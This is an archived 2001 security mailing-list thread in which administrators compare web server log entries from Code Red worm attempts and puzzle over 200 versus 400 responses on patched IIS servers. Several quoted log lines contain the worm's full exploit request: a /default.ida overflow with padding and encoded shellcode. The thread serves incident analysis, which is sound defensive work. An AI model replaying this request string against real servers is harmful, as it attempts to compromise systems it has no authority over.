Security Incidents mailing list archives
Re: Code Red hits
From: "Michael Tavares" <miketavares () mediaone net>
Date: Wed, 1 Aug 2001 16:30:12 -0400
This brings up an interesting point. I was scanning the logs on one of my servers and came across a several attempts, every other attempt is 200, while the rest are 400's. Below is 1 of each. The box is patched (and has been since MS released the patch). I have confirmed the patch with the Code Red Scanner posted by eeye. Anyone care to explain why this is? 2001-08-01 08:38:24 210.50.3.34 - 2xx.xxx.xxx.xxx GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u90 90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 400 0 470 2001-08-01 12:02:14 211.194.153.141 - 208.xxx.xxx.xxx GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u90 90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 171 4039 ----- Original Message ----- From: Portnoy, Gary <gportnoy () belenosinc com> To: 'Powers, James L.' <JLPowers () cmhmetro net>; <incidents () securityfocus com> Sent: Wednesday, August 01, 2001 1:57 PM Subject: RE: Code Red hits
James, The HTTP code says 200, meaning successful.. Double check the patches on
the
boxes to make sure you aren't contributing.... -Gary- -----Original Message----- From: Powers, James L. [mailto:JLPowers () cmhmetro net] Sent: Wednesday, August 01, 2001 1:30 PM To: incidents () securityfocus com Subject: Code Red hits Time is GMT. We are using eyeball scanners on our log files. 2001-08-01 17:06:02 209.27.247.5 - GET /default.ida
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 171 4039 94 80 HTTP/1.0 - - - 2001-08-01 17:12:50 203.232.75.19 - GET /default.ida
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 171 4039
578
80 HTTP/1.0 - - - --------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com --------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Code Red hits Powers, James L. (Aug 01)
- <Possible follow-ups>
- RE: Code Red hits Portnoy, Gary (Aug 01)
- Re: Code Red hits Michael Tavares (Aug 01)
- RE: Code Red hits Bryan Willis (Aug 01)
- RE: Code Red hits Dave Salovesh (Aug 01)
- Code Red hits from inside network? Nuno Fernandes (Aug 01)